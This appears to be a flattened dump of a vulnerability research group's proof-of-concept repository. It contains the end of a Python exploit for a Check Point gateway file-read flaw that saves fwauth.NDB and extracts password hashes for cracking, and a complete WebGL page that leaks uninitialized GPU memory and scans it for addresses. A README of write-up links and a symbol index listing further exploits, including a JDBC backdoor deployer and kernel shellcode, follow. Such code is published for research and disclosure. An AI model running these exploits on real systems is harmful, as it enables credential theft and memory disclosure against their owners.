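    response = session.get("{}/clients/MyCRL".format(url), data=raw_body, headers=headers, verify=False, timeout=timeout)
    # A path ending in '/' has no basename; fall back to a fixed name.
    s_filename = filename.split("/")[-1] or "download.bin"
    if response.status_code == 200:
        print('[+] The vulnerability exists, and the file will be saved locally.')
        with open(s_filename, 'wb') as file:
            file.write(response.content)
        if "fwauth.NDB" in filename:
            result = parse_bin_data(response.content)
            print("[!] You can use hashcat for brute-forcing.")
            print("[!] The type of hash is DES(Unix).")
            for entry in result:
                print("[+] " + f"Username: {entry['name']}, Password_Hash: {entry['internal_password']}")
    else:
        print('[!] The target is inappropriate.')
        raise SystemExit(1)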
# CLI entry: exp.py <https://target> </absolute/path/on/target>
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument("url")
arg_parser.add_argument("filename")
cli_args = arg_parser.parse_args()
fget(cli_args.url, cli_args.filename)
================================================
FILE: CVE-2026-5283/poc.html
================================================
<!DOCTYPE html>
<html><head><title>CVE-2026-5283: GPU Address Leak</title>
<style>
body{font-family:monospace;background:#111;color:#ddd;margin:20px}
canvas{border:1px solid #555;margin:3px}
pre{background:#0a0a0a;padding:10px;max-height:600px;overflow:auto;font-size:11px}
.red{color:#f44;font-weight:bold}.grn{color:#4f4}.yel{color:#ff0}.cyan{color:#0ff}
</style>
</head>
<body>
<h3>CVE-2026-5283: GPU Internal Address Leak</h3>
<div id="canvases"></div>
<pre id="log"></pre>
<script>
/* L appends a line to the on-page log (HTML is not escaped: only literal
 * strings and numbers are logged below). */
const L=s=>{const e=document.getElementById('log');e.innerHTML+=s+'\n';e.scrollTop=e.scrollHeight};
const gl=document.createElement('canvas').getContext('webgl2');
if(!gl){L('No WebGL2');throw'x'}
/* WEBGL_debug_renderer_info is optional and often masked; fall back to RENDERER. */
const dbg=gl.getExtension('WEBGL_debug_renderer_info');
L('Renderer: '+(dbg?gl.getParameter(dbg.UNMASKED_RENDERER_WEBGL):gl.getParameter(gl.RENDERER)));
/* 512x512 RGBA8 array texture with 8 layers; only layer 3 is ever cleared. */
const SIZE=512, LAYERS=8, CLEAR_LAYER=3;
/*
 * Strategy (assumption, driver-dependent): the GPU driver is expected to keep
 * internal metadata (texture descriptors, buffer descriptors, sampler states,
 * render-target info) in the same GPU heap as texture data, and that metadata
 * is expected to contain GPU virtual addresses. Nothing below verifies this;
 * the "address patterns" searched for in Phase 5 are heuristics.
*
* Phase 1: Create LOTS of GPU objects to generate internal metadata
* Phase 2: Delete everything → metadata memory freed to GPU heap
* Phase 3: Allocate array texture → reuses freed metadata memory
* Phase 4: Trigger CVE-2026-5283 → read uninitialized layers
* Phase 5: Scan leaked data for address-like patterns
*/
/* ---- Phase 1: Create many GPU objects to spray internal metadata ---- */
L('\n[Phase 1] Creating GPU objects to spray driver metadata...');
/* Handles are kept so Phase 2 can delete them all at once. */
const textures=[], fbos=[], rbs=[], bufs=[], samplers=[], vaos=[];
/* Many textures with various formats → texture descriptors contain base_addr */
/* Sizes 64..512 and four internal formats cycle with i; storage is null
 * (allocated, not uploaded) and full mip chains are generated. */
for(let i=0;i<100;i++){
const t=gl.createTexture();
gl.bindTexture(gl.TEXTURE_2D,t);
const sz=[64,128,256,512][i%4];
const fmt=[gl.RGBA8,gl.RGBA16F,gl.RGB8,gl.RG8][i%4];
const tp=[gl.UNSIGNED_BYTE,gl.HALF_FLOAT,gl.UNSIGNED_BYTE,gl.UNSIGNED_BYTE][i%4];
const bf=[gl.RGBA,gl.RGBA,gl.RGB,gl.RG][i%4];
gl.texImage2D(gl.TEXTURE_2D,0,fmt,sz,sz,0,bf,tp,null);
gl.texParameteri(gl.TEXTURE_2D,gl.TEXTURE_MIN_FILTER,gl.LINEAR_MIPMAP_LINEAR);
gl.generateMipmap(gl.TEXTURE_2D);
textures.push(t);
}
L(' 100 textures with mipmaps');
/* FBOs with attachments → render target descriptors */
/* Each FBO gets level 0 of textures[i] as its colour attachment. */
for(let i=0;i<50;i++){
const f=gl.createFramebuffer();
gl.bindFramebuffer(gl.FRAMEBUFFER,f);
if(textures[i])
gl.framebufferTexture2D(gl.FRAMEBUFFER,gl.COLOR_ATTACHMENT0,gl.TEXTURE_2D,textures[i],0);
gl.bindFramebuffer(gl.FRAMEBUFFER,null);
fbos.push(f);
}
L(' 50 FBOs');
/* Renderbuffers → internal storage descriptors */
/* Colour, depth+stencil and depth-only storage, 64..256 square. */
for(let i=0;i<50;i++){
const r=gl.createRenderbuffer();
gl.bindRenderbuffer(gl.RENDERBUFFER,r);
gl.renderbufferStorage(gl.RENDERBUFFER,[gl.RGBA8,gl.DEPTH24_STENCIL8,gl.DEPTH_COMPONENT16][i%3],[64,128,256][i%3],[64,128,256][i%3]);
rbs.push(r);
}
L(' 50 renderbuffers');
/* Buffers with data → buffer descriptors contain GPU addresses */
/* bufferData with a size (not an array): storage is reserved, contents unspecified. */
for(let i=0;i<100;i++){
const b=gl.createBuffer();
gl.bindBuffer(gl.ARRAY_BUFFER,b);
gl.bufferData(gl.ARRAY_BUFFER,[256,1024,4096,16384][i%4],gl.DYNAMIC_DRAW);
bufs.push(b);
}
L(' 100 buffers');
/* Samplers → sampler state objects */
/* Samplers are also bound to texture units 0..3 so they are "live" state. */
for(let i=0;i<30;i++){
const s=gl.createSampler();
gl.samplerParameteri(s,gl.TEXTURE_MIN_FILTER,[gl.NEAREST,gl.LINEAR,gl.LINEAR_MIPMAP_LINEAR][i%3]);
gl.samplerParameteri(s,gl.TEXTURE_WRAP_S,[gl.REPEAT,gl.CLAMP_TO_EDGE,gl.MIRRORED_REPEAT][i%3]);
gl.bindSampler(i%4,s);
samplers.push(s);
}
L(' 30 samplers');
/* VAOs → vertex attrib state */
/* Each VAO references bufs[i] through attribute 0 (4 floats, tightly packed). */
for(let i=0;i<30;i++){
const v=gl.createVertexArray();
gl.bindVertexArray(v);
if(bufs[i]){
gl.bindBuffer(gl.ARRAY_BUFFER,bufs[i]);
gl.vertexAttribPointer(0,4,gl.FLOAT,false,0,0);
gl.enableVertexAttribArray(0);
}
vaos.push(v);
}
gl.bindVertexArray(null);
L(' 30 VAOs');
/* Force GPU to process all object creation */
gl.finish();
/* Also render into some FBOs to generate render target metadata */
/* Only complete FBOs are cleared, with a random colour, in a 64x64 viewport. */
for(let i=0;i<20;i++){
gl.bindFramebuffer(gl.FRAMEBUFFER,fbos[i]);
if(gl.checkFramebufferStatus(gl.FRAMEBUFFER)===gl.FRAMEBUFFER_COMPLETE){
gl.viewport(0,0,64,64);
gl.clearColor(Math.random(),Math.random(),Math.random(),1);
gl.clear(gl.COLOR_BUFFER_BIT);
}
}
gl.bindFramebuffer(gl.FRAMEBUFFER,null);
gl.viewport(0,0,SIZE,SIZE);
gl.finish();
L(' Rendered to 20 FBOs');
/* ---- Phase 2: Delete EVERYTHING to free metadata back to GPU heap ---- */
L('\n[Phase 2] Deleting all objects → driver metadata freed to GPU heap...');
/* Delete in reverse dependency order (VAOs/samplers/FBOs first, then the
 * renderbuffers, buffers and textures they referenced) and wait for the
 * GPU so the frees are actually processed before Phase 3 allocates. */
for(const v of vaos) gl.deleteVertexArray(v);
for(const s of samplers){gl.deleteSampler(s);}
for(const f of fbos) gl.deleteFramebuffer(f);
for(const r of rbs) gl.deleteRenderbuffer(r);
for(const b of bufs) gl.deleteBuffer(b);
for(const t of textures) gl.deleteTexture(t);
gl.finish();
L(' Deleted 100 tex + 50 FBO + 50 RB + 100 buf + 30 sampler + 30 VAO');
/* ---- Phase 3: Allocate array texture → reuse freed metadata memory ---- */
L('\n[Phase 3] Allocating target array texture...');
/* texImage3D with null data: per the WebGL spec the implementation must
 * behave as if the texture were zero-filled. Any non-zero content read back
 * from an uncleared layer in Phase 5 is what this PoC treats as the bug. */
const tex2=gl.createTexture();
gl.bindTexture(gl.TEXTURE_2D_ARRAY,tex2);
gl.texImage3D(gl.TEXTURE_2D_ARRAY,0,gl.RGBA8,SIZE,SIZE,LAYERS,0,gl.RGBA,gl.UNSIGNED_BYTE,null);
/* ---- Phase 4: Trigger CVE-2026-5283 ---- */
/* Clear exactly one layer (CLEAR_LAYER) to opaque green through a layer
 * attachment. The hypothesis under test is that touching a single layer
 * this way leaves the other layers' backing memory uninitialised. */
const clearFBO=gl.createFramebuffer();
gl.bindFramebuffer(gl.FRAMEBUFFER,clearFBO);
gl.framebufferTextureLayer(gl.FRAMEBUFFER,gl.COLOR_ATTACHMENT0,tex2,0,CLEAR_LAYER);
gl.clearColor(0,1,0,1);
gl.clear(gl.COLOR_BUFFER_BIT);
gl.bindFramebuffer(gl.FRAMEBUFFER,null);
gl.deleteFramebuffer(clearFBO);
L('[Phase 4] Cleared layer '+CLEAR_LAYER+' only → bug triggered');
/* ---- Phase 5: Read + scan for GPU addresses ---- */
L('\n[Phase 5] Scanning leaked data for GPU addresses...');
let totalLeaked=0;
const leakedData=[];
for(let layer=0;layer<LAYERS;layer++){
const readFBO=gl.createFramebuffer();
gl.bindFramebuffer(gl.FRAMEBUFFER,readFBO);
gl.framebufferTextureLayer(gl.FRAMEBUFFER,gl.COLOR_ATTACHMENT0,tex2,0,layer);
const px=new Uint8Array(SIZE*SIZE*4);
gl.readPixels(0,0,SIZE,SIZE,gl.RGBA,gl.UNSIGNED_BYTE,px);
gl.bindFramebuffer(gl.FRAMEBUFFER,null);
gl.deleteFramebuffer(readFBO);
let nonzero=0;
for(let i=0;i<px.length;i++) if(px[i]!==0) nonzero++;
if(layer===CLEAR_LAYER){L(' Layer '+layer+': CLEARED');continue}
if(nonzero===0){L(' Layer '+layer+': <span class="grn">zeros</span>');continue}
totalLeaked+=nonzero;
leakedData.push({layer,px});
L(' Layer '+layer+': <span class="red">LEAKED '+nonzero+' bytes</span>');
const u32=new Uint32Array(px.buffer);
/* Scan for address-like patterns:
* GPU virtual addresses on ARM Mali: typically 0x00000000-0x0000FFFF (low) or page-aligned
* GPU virtual addresses on Adreno: various ranges
* Look for: page-aligned values, non-zero upper bits, pointer-like patterns */
/* Pattern 1: Page-aligned values (multiple of 0x1000) */
let pageAligned=0;const pageAddrs=[];
for(let j=0;j<u32.length;j++){
if(u32[j]!==0 && (u32[j]&0xFFF)===0 && u32[j]<0xFFFF0000){
pageAligned++;
if(pageAddrs.length<8) pageAddrs.push('0x'+u32[j].toString(16).padStart(8,'0'));
}
}
if(pageAligned>5){
L(' <span class="cyan">Page-aligned addresses: '+pageAligned+'</span>');
L(' <span class="cyan"> '+pageAddrs.join(', ')+'</span>');
}
/* Pattern 2: Values in typical GPU VA ranges */
let gpuVA=0;const gpuAddrs=[];
for(let j=0;j<u32.length;j++){
const v=u32[j];
/* Common GPU VA ranges on mobile: 0x10000-0x80000000 */
if(v>=0x10000 && v<0x80000000 && v!==0x00FF00FF && v!==0xFF00FF00){
gpuVA++;
if(gpuAddrs.length<8) gpuAddrs.push('0x'+v.toString(16).padStart(8,'0'));
}
}
if(gpuVA>20){
L(' <span class="cyan">GPU VA range values: '+gpuVA+'</span>');
L(' <span class="cyan"> '+gpuAddrs.join(', ')+'</span>');
}
/* Pattern 3: Repeating pointer-like pairs (common in descriptor tables) */
let pairCount=0;const pairs=[];
for(let j=0;j<u32.length-1;j++){
const a=u32[j],b=u32[j+1];
if(a>=0x1000 && a<0x80000000 && b>=0x1000 && b<0x80000000 &&
Math.abs(a-b)<0x100000 && a!==b){
pairCount++;
if(pairs.length<4) pairs.push('(0x'+a.toString(16)+', 0x'+b.toString(16)+')');
}
}
if(pairCount>5){
L(' <span class="cyan">Address pairs (descriptors?): '+pairCount+'</span>');
L(' <span class="cyan"> '+pairs.join(', ')+'</span>');
}
/* Pattern 4: Non-trivial u32 values (not 0, not 0xFF, not 0xFFFF) */
const histogram={};
for(let j=0;j<u32.length;j++){
const v=u32[j];
if(v!==0 && v!==0xFF && v!==0xFF00 && v!==0xFF00FF && v!==0x00FF00FF &&
v!==0xFF00FF00 && v!==0xFFFFFFFF && v!==0xFF000000 && v!==0x00FF0000){
histogram[v]=(histogram[v]||0)+1;
}
}
const unique=Object.keys(histogram).length;
if(unique>100){
L(' <span class="cyan">Unique non-trivial u32: '+unique+' (rich metadata!)</span>');
/* Show top repeated values — likely descriptor fields */
const sorted=Object.entries(histogram).sort((a,b)=>b[1]-a[1]).slice(0,5);
for(const[v,c]of sorted){
L(' <span class="yel"> 0x'+parseInt(v).toString(16).padStart(8,'0')+' × '+c+'</span>');
}
}
/* Entropy */
const hist=new Array(256).fill(0);
for(let i=0;i<px.length;i++) hist[px[i]]++;
let ent=0;
for(let i=0;i<256;i++){if(hist[i]>0){const p=hist[i]/px.length;ent-=p*Math.log2(p)}}
L(' Entropy: '+ent.toFixed(2)+' bits'+(ent>4?' <span class="red">(VERY HIGH)</span>':ent>2?' <span class="yel">(moderate)</span>':''));
/* Hex dump — first 128 bytes as both hex and u32 */
L(' Raw hex: '+Array.from(px.slice(0,64)).map(b=>b.toString(16).padStart(2,'0')).join(' '));
const u32_sample=new Uint32Array(px.buffer,0,16);
L(' As u32: '+Array.from(u32_sample).map(v=>'0x'+v.toString(16).padStart(8,'0')).join(' '));
}
/* Visualize: one 256x256 thumbnail per leaked layer. Each thumbnail pixel is
   nearest-neighbour sampled (floor) from the SIZE x SIZE readback in `px`,
   and alpha is forced to 255 so the raw RGB bytes are shown as-is. */
const canvasHost=document.getElementById('canvases');
for(const{layer,px}of leakedData){
  const cv=document.createElement('canvas');
  cv.width=256;cv.height=256;
  canvasHost.appendChild(cv);
  const g2d=cv.getContext('2d');
  const frame=g2d.createImageData(256,256);
  const step=SIZE/256;
  let dst=0;
  for(let row=0;row<256;row++){
    const srcRow=Math.floor(row*step)*SIZE;
    for(let col=0;col<256;col++){
      const src=(srcRow+Math.floor(col*step))*4;
      frame.data[dst++]=px[src];
      frame.data[dst++]=px[src+1];
      frame.data[dst++]=px[src+2];
      frame.data[dst++]=255;
    }
  }
  g2d.putImageData(frame,0,0);
  g2d.fillStyle='#fff';
  g2d.font='11px monospace';
  g2d.fillText('Layer '+layer,5,12);
}
/* Verdict. `totalLeaked` is accumulated earlier in the script (presumably a
   count of non-zero readback bytes — confirm against the readback loop); a
   zero count is reported as "Not vulnerable" but only shows this run read
   back nothing, not that the driver/ANGLE build is patched. */
L('\n'+'='.repeat(60));
if(totalLeaked>0){
  L('<span class="red">CVE-2026-5283: '+totalLeaked+' bytes leaked from '+leakedData.length+' layers</span>');
  L('Check above for page-aligned addresses, GPU VA ranges, descriptor pairs');
}else{
  L('<span class="grn">Not vulnerable</span>');
}
/* Title doubles as a machine-readable result for automated runs. */
document.title=totalLeaked>0?'LEAK':'OK';
/* Report any pending GL error before releasing the second texture. */
L('GL error: 0x'+gl.getError().toString(16));
gl.deleteTexture(tex2);
</script>
</body>
</html>
================================================
FILE: README.md
================================================
---
## PoCs/Exploits for some interesting vulnerabilities
### Author: Vulnerability Research Team of Numen Cyber Labs
---
1. TCP/IP RCE Vulnerability (CVE-2022-34718) PoC Restoration and Analysis
https://medium.com/@numencyberlabs/analysis-and-summary-of-tcp-ip-protocol-remote-code-execution-vulnerability-cve-2022-34718-8fcc28538acf
2. CVE-2022-36537 Vulnerability Technical Analysis with Exploit
https://medium.com/@numencyberlabs/cve-2022-36537-vulnerability-technical-analysis-with-exp-667401766746
3. CVE-2021-38003: From Leaking TheHole to Chrome Renderer RCE
https://medium.com/numen-cyber-labs/from-leaking-thehole-to-chrome-renderer-rce-183dcb6f3078
4. CVE-2022-42889: Text4Shell Vulnerability Technical Analysis
https://medium.com/@numencyberlabs/text4shell-or-act4shell-vulnerability-analysis-a860d141e3e5
5. Zero-Day Vulnerability: Chromium V8 JS Engine Issue 1303458 — Use-After-Free in x64 Instruction Optimization, Vulnerability Analysis
https://medium.com/bugbountywriteup/zero-day-vulnerability-chromium-v8-js-engine-issue-1303458-use-after-free-in-x64-instruction-e874419436a6
6. CVE-2022-3723: exploit based on Google's public PoC
https://medium.com/@numencyberlabs/use-native-pointer-of-function-to-bypass-the-latest-chrome-v8-sandbox-exp-of-issue1378239-251d9c5b0d14
7. CVE-2023-41047: OctoPrint Remote Code Execution Vulnerability
https://medium.com/@numencyberlabs/octoprint-remote-code-execution-vulnerability-7e36372d6c2b
8. CVE-2024-24919: Check Point Security Gateways Arbitrary File Read Vulnerability
https://medium.com/@numencyberlabs/cve-2024-24919-check-point-security-gateways-arbitrary-file-read-vulnerability-f33b296be408
9. CVE-2026-5283: Uninitialized GPU Memory Disclosure via Partial Clear in ANGLE (Chrome WebGL)
https://medium.com/@numencyberlabs/cve-2026-5283-uninitialized-gpu-memory-disclosure-via-partial-clear-in-angle-chrome-webgl-3740ca481149
---
## The Analysis of Web3-related vulnerabilities
### Discovered by Numen Web3 security products
### Author: Web3 Security Team of Numen Cyber Labs
---
1. Analysis of the First Critical Vulnerability of Aptos Move VM
https://medium.com/numen-cyber-labs/analysis-of-the-first-critical-0-day-vulnerability-of-aptos-move-vm-8c1fd6c2b98e
2. The Story of a High-Risk Vulnerability in Move Reference Safety Verify Module
https://medium.com/numen-cyber-labs/the-story-of-a-high-vulnerability-in-move-reference-safety-verify-module-2340f3d8c642
SYMBOL INDEX (49 symbols across 9 files)
FILE: CVE-2022-34718/poc.cpp
function SHA1 (line 44) | void SHA1(PUCHAR str_data, DWORD len)
function BOOL (line 64) | BOOL GetGlobalData()
function main (line 85) | int main()
FILE: CVE-2022-36537/Driver.java
class Driver (line 11) | public class Driver implements java.sql.Driver {
method connect (line 31) | @Override
method acceptsURL (line 36) | @Override
method getPropertyInfo (line 41) | @Override
method getMajorVersion (line 46) | @Override
method getMinorVersion (line 51) | @Override
method jdbcCompliant (line 56) | @Override
method getParentLogger (line 61) | @Override
FILE: CVE-2022-36537/cve-2022-36537.py
function bypass_auth1 (line 39) | def bypass_auth1(target):
function bypass_auth2 (line 59) | def bypass_auth2(target):
function forward_request (line 74) | def forward_request(target, next_uri, cookie_str, uuid, dtid):
function read_file (line 88) | def read_file(target, filename):
function deploy_jdbc_backdoor (line 96) | def deploy_jdbc_backdoor(target):
function upload_jdbc_backdoor (line 141) | def upload_jdbc_backdoor(uri, cookie_str):
function build_jdbc_backdoor (line 152) | def build_jdbc_backdoor():
function banner (line 177) | def banner():
function parse_args (line 182) | def parse_args():
FILE: CVE-2022-3723/mainHttps.go
function faviconHandler (line 85) | func faviconHandler(w http.ResponseWriter, r *http.Request) {
function check (line 89) | func check(e error) {
function isValidAddress (line 94) | func isValidAddress(str string) bool {
function processShellcodeAddr (line 99) | func processShellcodeAddr(str string, code string) (string, error) {
function fileServerHandler (line 107) | func fileServerHandler(w http.ResponseWriter, r *http.Request) {
function main (line 198) | func main() {
FILE: CVE-2023-23410/CVE-2023-23410_poc.c
function wmain (line 7) | int
FILE: CVE-2023-28231/CVE-2023-28231-DHCP-VUL-PoC.cpp
function main (line 8) | int main() {
FILE: CVE-2023-29336/poc.cpp
type _SHELLCODE (line 30) | struct _SHELLCODE {
type tagMENU (line 39) | struct tagMENU
type MyData (line 64) | struct MyData
type ThreadParams (line 96) | struct ThreadParams {
function GetGsValue (line 102) | static unsigned long long GetGsValue(unsigned long long gsValue)
function PVOID (line 106) | PVOID
function PVOID (line 137) | PVOID
function VOID (line 169) | static
function VOID (line 192) | VOID
function ULONG64 (line 225) | ULONG64 Read64(ULONG64 address)
function exploit (line 235) | void exploit()
function buildmem (line 287) | void buildmem()
function WinMain (line 413) | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR l...
function LRESULT (line 505) | LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM ...
function syytem (line 547) | int syytem()
FILE: CVE-2023-41047/CVE-2023-41047.go
constant CSRFTOKEN (line 18) | CSRFTOKEN = "ImU4ZmY1NDhlZTU1ZGI5M2I2MjA3YmZhYjAxY2QzOWQxOTRiN2Q0YTgi.ZU...
function getLoginCookie (line 20) | func getLoginCookie(uri string) string {
function setRequest (line 72) | func setRequest(uri string, cookie string, payload string, types int, wg...
function main (line 110) | func main() {
FILE: CVE-2024-24919/exp.py
function parse_bin_data (line 12) | def parse_bin_data(bin_data):
function fget (line 35) | def fget(url,filename):